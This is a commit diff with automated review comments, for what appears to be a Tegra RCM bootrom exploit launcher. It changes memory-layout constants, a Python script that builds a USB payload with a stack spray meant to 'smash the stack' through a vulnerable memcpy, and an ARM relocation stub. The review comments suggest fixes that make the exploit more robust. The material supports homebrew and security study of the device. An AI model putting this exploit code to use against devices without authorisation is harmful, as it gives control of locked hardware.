Restruct the payload, so it can fit more code

trisz404 2018-05-02 16:10:51 +02:00
parent e7b42b9279
commit 9e0ed49e71
6 changed files with 45 additions and 24 deletions


@ -25,27 +25,33 @@ LDFLAGS =
all: intermezzo.bin
# The start of the BPMP IRAM.
START_OF_IRAM := 0x40000000
# The new address of the Intermezzo after copy
INTERMEZZO_RELOCATED_ADDRESS := 0x4000F000
# The address to which Intermezzo is to be loaded by the payload launcher.
INTERMEZZO_ADDRESS := 0x4001F000
INTERMEZZO_ADDRESS := 0x40010000
# The address we want the final payload to be located at.
RELOCATION_TARGET := 0x40010000
# The addrss and length of the data loaded by f-g.
LOAD_BLOCK_START := 0x40020000
LOAD_BLOCK_LENGTH := 0x20000
PAYLOAD_START_ADDR := 0x40010E40
STACK_SPRAY_START := 0x40014E40
STACK_SPRAY_END := 0x40017000
BEFORE_SPRAY_LENGTH := $(shell echo $$(( $(STACK_SPRAY_START) - $(PAYLOAD_START_ADDR) )))
AFTER_SPRAY_LENGTH := 0x30000
ENTRY_POINT_ADDRESS := 0x40010000
# Provide the definitions used in the intermezzo stub.
DEFINES := \
-DSTART_OF_IRAM=$(START_OF_IRAM) \
-DINTERMEZZO_RELOCATED_ADDRESS=$(INTERMEZZO_RELOCATED_ADDRESS) \
-DRELOCATION_TARGET=$(RELOCATION_TARGET) \
-DLOAD_BLOCK_START=$(LOAD_BLOCK_START) \
-DLOAD_BLOCK_LENGTH=$(LOAD_BLOCK_LENGTH) \
-DPAYLOAD_START_ADDR=$(PAYLOAD_START_ADDR) \
-DSTACK_SPRAY_START=$(STACK_SPRAY_START) \
-DSTACK_SPRAY_END=$(STACK_SPRAY_END) \
-DBEFORE_SPRAY_LENGTH=$(BEFORE_SPRAY_LENGTH) \
-DAFTER_SPRAY_LENGTH=$(AFTER_SPRAY_LENGTH) \
-DENTRY_POINT_ADDRESS=$(ENTRY_POINT_ADDRESS)
intermezzo.elf: intermezzo.o
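Review bot: `AFTER_SPRAY_LENGTH := 0x30000` is the one new layout value that is neither derived nor explained, and it fixes how far past STACK_SPRAY_END intermezzo.S will read (up to 0x40047000) regardless of the real payload size; the four addresses above it are also restated by hand in the Python launcher, so a change on either side silently breaks the other. I would derive the dependent values the way BEFORE_SPRAY_LENGTH already is, e.g. `STACK_SPRAY_START := $(shell printf '0x%x' $$(( $(PAYLOAD_START_ADDR) + 0x4000 )))`, and put a comment on the literal that remains stating what bounds it: `# Bytes copied after the spray gap; STACK_SPRAY_END + AFTER_SPRAY_LENGTH must stay inside IRAM.` The 0xE40 gap between RELOCATION_TARGET and PAYLOAD_START_ADDR appears to be the room left for intermezzo.bin itself (the launcher pads from the end of Intermezzo up to PAYLOAD_START_ADDR); if so, say that in the comment on PAYLOAD_START_ADDR, since nothing in the build checks that the binary fits.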


@ -32,8 +32,9 @@ import platform
# specify the locations of important load components
RCM_PAYLOAD_ADDR = 0x40010000
INTERMEZZO_LOCATION = 0x4001F000
PAYLOAD_LOAD_BLOCK = 0x40020000
PAYLOAD_START_ADDR = 0x40010E40
STACK_SPRAY_START = 0x40014E40
STACK_SPRAY_END = 0x40017000
# notes:
# GET_CONFIGURATION to the DEVICE triggers memcpy from 0x40003982
@ -445,9 +446,6 @@ payload += b'\0' * (680 - len(payload))
# Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
# We'll use this data to smash the stack when we execute the vulnerable memcpy.
print("\nSetting ourselves up to smash the stack...")
repeat_count = int((INTERMEZZO_LOCATION - RCM_PAYLOAD_ADDR) / 4)
intermezzo_location_raw = INTERMEZZO_LOCATION.to_bytes(4, byteorder='little')
payload += (intermezzo_location_raw * repeat_count)
# Include the Intermezzo binary in the command stream. This is our first-stage
# payload, and it's responsible for relocating the final payload to 0x40010000.
@ -458,15 +456,25 @@ with open(intermezzo_path, "rb") as f:
payload += intermezzo
# Finally, pad until we've reached the position we need to put the payload.
# This ensures the payload winds up at the location Intermezzo expects.
position = INTERMEZZO_LOCATION + intermezzo_size
padding_size = PAYLOAD_LOAD_BLOCK - position
# Pad the payload till the start of the payload
padding_size = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)
payload += (b'\0' * padding_size)
# Read the payload into memory.
target_payload = b''
# Read the rest of the payload into memory.
with open(payload_path, "rb") as f:
payload += f.read()
target_payload = f.read()
# First part of the payload
padding_size = STACK_SPRAY_START - PAYLOAD_START_ADDR
payload += target_payload[:padding_size]
# Gap in the payload, stack spray
repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)
payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count)
# Read the rest of the payload into memory.
payload += target_payload[padding_size:]
# Pad the payload to fill a USB request exactly, so we don't send a short
# packet and break out of the RCM loop.
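Review bot: Two of the new length computations fail silently. `padding_size = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)` goes negative once intermezzo.bin exceeds 0xE40 bytes, and `b'\0' * negative` is just `b''`, so the whole layout shifts with no error; and `target_payload[:padding_size]` is shorter than padding_size for any payload under 0x4000 bytes, which places the stack spray below STACK_SPRAY_START rather than at the address the layout is built around. I would fail loudly on the first and pad the second: `if padding_size < 0: raise ValueError("intermezzo.bin is larger than the 0x%x-byte slot before the payload" % (PAYLOAD_START_ADDR - RCM_PAYLOAD_ADDR))` and `payload += target_payload[:padding_size].ljust(padding_size, b'\0')`. `INTERMEZZO_LOCATION = 0x4001F000` is kept although this hunk removes its last visible uses and the Makefile now loads Intermezzo at 0x40010000; if nothing outside the hunk reads it, drop it rather than leave a stale address next to the live ones. The total length is not checked against the RCM load limit here, though that may happen past the end of this hunk.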


@ -8,15 +8,15 @@
_start:
// First, we'll need to move ourselves _out_ of the target area.
// We'll copy down into the start of the IRAM.
ldr r0, =START_OF_IRAM
// We'll copy down into the IRAM.
ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
ldr r1, =post_relocation
ldr r2, =intermezzo_end
sub r2, r2, r1
bl copy
// Jump to the start of RAM, which should now contain the post-relocation code.
ldr r0, =START_OF_IRAM
ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
bx r0
@ -25,8 +25,15 @@ post_relocation:
// Next, we'll copy our payload down to the appropriate relocaiton address.
ldr r0, =RELOCATION_TARGET
ldr r1, =LOAD_BLOCK_START
ldr r2, =LOAD_BLOCK_LENGTH
ldr r1, =PAYLOAD_START_ADDR
ldr r2, =BEFORE_SPRAY_LENGTH
bl copy
ldr r0, =RELOCATION_TARGET
ldr r1, =BEFORE_SPRAY_LENGTH
add r0, r0, r1
ldr r1, =STACK_SPRAY_END
ldr r2, =AFTER_SPRAY_LENGTH
bl copy
// Finally, jump into the relocated target.
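Review bot: The self-relocation copies post_relocation..intermezzo_end to INTERMEZZO_RELOCATED_ADDRESS (0x4000F000), which leaves exactly RELOCATION_TARGET - INTERMEZZO_RELOCATED_ADDRESS = 0x1000 bytes before the region the following copy overwrites; nothing verifies the stub fits, and if it grows past that the second copy will clobber the code executing it. With GNU as this can be caught at build time after the intermezzo_end label: `.if (intermezzo_end - post_relocation) > (RELOCATION_TARGET - INTERMEZZO_RELOCATED_ADDRESS)` / `.error "intermezzo does not fit below RELOCATION_TARGET"` / `.endif`. Both payload copies also move data downward within overlapping ranges (0x40010E40 to 0x40010000, and 0x40017000 to 0x40014000), so they are only correct if copy walks low-to-high; copy is outside this hunk, so a comment stating the requirement, `// Overlapping ranges with dest < src: copy must advance upward.`, would protect the next edit. Both _start and post_relocation continue past the end of the hunk.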

Binary file not shown.

Binary file not shown.

Binary file not shown.